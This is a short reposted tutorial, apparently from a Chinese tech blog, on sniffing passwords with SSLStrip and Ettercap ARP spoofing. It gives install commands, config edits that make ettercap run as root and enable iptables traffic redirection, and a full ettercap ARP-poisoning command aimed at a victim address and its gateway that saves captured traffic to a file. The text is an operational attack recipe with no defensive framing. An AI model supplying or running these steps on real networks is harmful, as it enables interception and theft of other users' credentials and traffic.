天天看点

利用SSLStrip & Ettercap ARP欺骗嗅探密码

apt-get purge ettercap

apt-get purge sslstrip

apt-get install ettercap

apt-get install sslstrip

# from http://blog.csdn.net/ghosttzs

First you need to configure ettecap for sniffing a ssl connection. Open etter.confand edit the lines:

    [privs]

    ec_uid = 65534 # nobody is the default

    ec_gid = 65534 # nobody is the default

    to

    ec_uid = 0 # nobody is the default

    ec_gid = 0 # nobody is the default

    # if you use iptables:

    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

    to this

    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"

    Next information that you need is the victim ip and the gateway ip. Let's assume that the victim ip is 10.0.0.2 and the gateway is 10.0.0.1:

    ettercap -Tq -i eth0 -M arp:remote /10.0.0.2/ /10.0.0.1/  -w /root/Desktop/HiRoot/test.cap

转载请注明出处

继续阅读